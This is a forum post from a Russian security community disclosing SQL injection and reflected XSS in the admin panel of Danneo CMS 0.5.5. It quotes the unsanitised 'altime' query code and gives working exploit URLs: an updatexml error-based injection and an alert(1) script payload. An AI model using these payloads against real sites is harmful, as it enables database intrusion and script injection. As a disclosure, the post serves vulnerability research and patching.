HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #7  
Старый 16.04.2014, 09:45
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418

Репутация: 652


По умолчанию

Danneo CMS 0.5.5

Danneo CMS 0.5.5

SQL Injection



Уязвимый сценарий
: http://127.0.0.1/cms_danneo/www/apanel/index.php

Уязвимый параметр: altime

Вектор: error-based

Требования: mq = off, права администратора

Уязвимый код:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]) && !empty([/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$ADMIN_LAST[/COLOR][COLOR="#007700"];

}

...

[/
COLOR][COLOR="#0000BB"]$unewspid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetchrow[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) AS total FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$basepref[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_news_user WHERE (public >= '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"]));

[/
COLOR][/COLOR
Exploit:

[127.0.0.1/cms_danneo/www/apanel/index.php?dn=index&altime=1397482241'or(updatexml(1,concat(0x3a,version()),4))or'--&ops=your_data]

passive XSS (reflected)

Уязвим этот же праметр altime.

Exploit:

[127.0.0.1/cms_danneo/www/apanel/index.php?dn=index&altime=1397482241">alert(1)&ops=your_data]
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.